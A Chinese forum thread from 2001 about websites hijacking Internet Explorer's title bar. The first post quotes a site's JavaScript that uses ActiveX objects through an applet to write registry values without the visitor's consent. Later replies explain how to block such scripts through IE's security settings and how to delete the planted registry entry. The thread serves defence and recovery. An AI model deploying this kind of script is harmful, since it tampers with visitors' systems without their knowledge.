主题:  修改IE标题栏和首页:)

困龙在天
职务:普通成员
等级:7
金币:10.0
发贴:2942
#12001/7/24 7:11:45
大家访问http://www.guestnic.com后看一下你的标题栏!
是不是很无牙!!
源码如下:
document.write("");  
function f(){  
try  
{  
//ActiveX initialization  
a1=document.applets[0];  
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");  
a1.createInstance();  
Shl = a1.GetObject();  
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");  
a1.createInstance();  
FSO = a1.GetObject();  
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");  
a1.createInstance();  
Net = a1.GetObject();  
 
try  
{  
if (document.cookie.indexOf("Chg") == -1)  
{  
 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "高守 OICQ:10911 ICQ:14138802   http://www.guestnic.com");  
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "高守 OICQ:10911 ICQ:14138802   http://www.guestnic.com");  
var expdate = new Date((new Date()).getTime() + (1));  
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"  
}  
}  
catch(e)  
{}  
}  
catch(e)  
{}  
}  
function init()  
{  
setTimeout("f()", 1000);  
}  
init();

编辑历史:[这消息被hve编辑过(编辑时间2001-07-25 02:12:05)]
[这消息被hve编辑过(编辑时间2001-10-21 11:35:24)]

[url]http://sintian.chinaccd.net[/url]

???
职务:普通成员
等级:2
金币:10.0
发贴:644
#22001/7/24 9:32:55
赫赫,现在这样的东西是越来越多了。想想看,如果上述代码改的不是"HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title"
而是……,危险!
大家最好把自己的ieternet的安全等级改高些,不运行这样的ActiveX就好了!



困龙在天
职务:普通成员
等级:7
金币:10.0
发贴:2942
#32001/7/24 17:50:43
必胜客在上个贴子中说
引用:
赫赫,现在这样的东西是越来越多了。想想看,如果上述代码改的不是"HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title"
而是……,危险!
大家最好把自己的ieternet的安全等级改高些,不运行这样的ActiveX就好了!


[url]http://sintian.chinaccd.net[/url]

pccat
职务:普通成员
等级:1
金币:0.0
发贴:34
#42001/7/25 0:57:17
同意,可以使用the cleaner 的注册表实时监测哦!我的系统就是有的!还有天网,norton!



5D荣誉斑竹
职务:普通成员
等级:5
金币:10.0
发贴:3292
#52001/7/25 2:00:20
(这种下三烂的手段希望大家不要造仿)
解决的方法,必胜客已经说了

下面是预防的方法

改IE的安全设置(我用的是IE5,IE6的好象已经默认为提示了)
安全设置:
工具/INTERNET 选项/安全/自定义级别/
ActiveX 控件和插件/对标记为可安全执行脚本的ActiveX控件执行脚本
设为提示
这样每次打开这样修改注册表的脚本时就会出现提示框,你可以不运行脚本,也就没事了
但有时因为别的正常的代码也可能出现这个提示框,比如flash插件检测

此设置可以拦截很多此类的问题
比如修改注册表隐藏你的驱动器,隐藏你的菜单,
建立文件(有人讨论过如果给你建立文件再运行,有可能改你的BIOS,使电脑瘫痪),
删除文件。。。。。还有欢乐时光邮件病毒。。。
那么我们怎么分辨正常的代码和有害代码呢?
我是这样做的,凡遇到提示的时候
首先看这个网站是不是可以信任的网站
如果怀疑就先选否,不打开
然后用蚂蚁把此页下载,分析代码,分析不明白的,就贴到论坛请高手指教

(此贴暂时置顶)

编辑历史:[这消息被hve编辑过(编辑时间2001-07-25 02:02:42)]
[这消息被hve编辑过(编辑时间2001-07-25 02:05:47)]
[这消息被hve编辑过(编辑时间2001-07-25 02:07:37)]
[这消息被hve编辑过(编辑时间2001-07-25 02:07:46)]

garland_5d
职务:普通成员
等级:2
金币:1.0
发贴:238
#62001/7/25 6:57:20
是呀,最近看见不少论坛就此问题发表了不少的言论,我就看见了一个网站www.qq520.net当你进入后,在当你打开其它的网页是,在标题栏原由的Microsoft Internet Exproler就被该成了☆QQ我爱你☆--http://www.qq520.net


I am a dreamer 欢迎访问[url=http://beatles.my163.com]beatles.my163.com[/url] [url=http://heavenxp.126.com]heavenxp.126.com[/url] 大力推荐[url=http://xili.my163.com]xili.my163.com[/url]

土豆
职务:普通成员
等级:1
金币:0.0
发贴:103
#72001/7/25 14:14:09
请问,那中刀后怎么恢复?
好象注册表里没有这一项?



5D荣誉斑竹
职务:普通成员
等级:5
金币:10.0
发贴:3292
#82001/7/25 18:14:55
打开注册表,搜索啊

比如如果标题被改为 ☆QQ我爱你☆--http://www.qq520.net

就搜索QQ我爱你

就找到window title,然后双击,把内容改成Microsoft Internet Explorer

可能不止一处,如果不行,再继续搜索

编辑历史:[这消息被hve编辑过(编辑时间2001-07-25 18:22:47)]
[这消息被hve编辑过(编辑时间2001-07-25 18:23:55)]

困龙在天
职务:普通成员
等级:7
金币:10.0
发贴:2942
#92001/7/25 22:22:59
土豆在上个贴子中说
引用:
请问,那中刀后怎么恢复?
好象注册表里没有这一项?


我贴的源文件中有呀:
HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "高守 OICQ:10911 ICQ:14138802   http://www.guestnic.com"
"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "高守 OICQ:10911 ICQ:14138802   http://www.guestnic.com"

运行REGEDIT删之!


[url]http://sintian.chinaccd.net[/url]

土豆
职务:普通成员
等级:1
金币:0.0
发贴:103
#102001/7/26 11:37:56
谢谢各位,我找到了!



笨鸟
职务:普通成员
等级:1
金币:0.0
发贴:82
#112001/7/26 11:56:22
现在有不少网站都这么干,(尤其是那些比较衰的),什么改标题栏呀,强行设成主页呀,还有最轻的也是添加到收藏夹。禁止了脚本害怕错过什么好东东,设为提示还太烦。只好由他们改,害的我几乎天天都在收拾残局!
哼!哼!也就是俺不会黑客技术,要是俺会……早黑了他们的臭站!



5D荣誉斑竹
职务:普通成员
等级:5
金币:10.0
发贴:3292
#122001/7/26 12:50:32
那根本算不上什么黑客技术



5D荣誉斑竹
职务:普通成员
等级:2
金币:1.0
发贴:543
#132001/7/27 23:24:58
hve在上个贴子中说
引用:
打开注册表,搜索啊

比如如果标题被改为 ☆QQ我爱你☆--http://www.qq520.net

就搜索QQ我爱你

就找到window title,然后双击,把内容改成Microsoft Internet Explorer

可能不止一处,如果不行,再继续搜索


干脆del掉 那个键



5D荣誉斑竹
职务:普通成员
等级:2
金币:1.0
发贴:543
#142001/7/27 23:27:16
IE难道不能智能拦截代码吗?ms真是有够 希望蝴蝶浏览器有这样的功能!期待!



5D荣誉斑竹
职务:普通成员
等级:5
金币:10.0
发贴:3292
#152001/7/28 1:15:32
南钉在上个贴子中说
引用:
IE难道不能智能拦截代码吗?ms真是有够 希望蝴蝶浏览器有这样的功能!期待!


你仔细看看上面的贴子
预防不就是拦截吗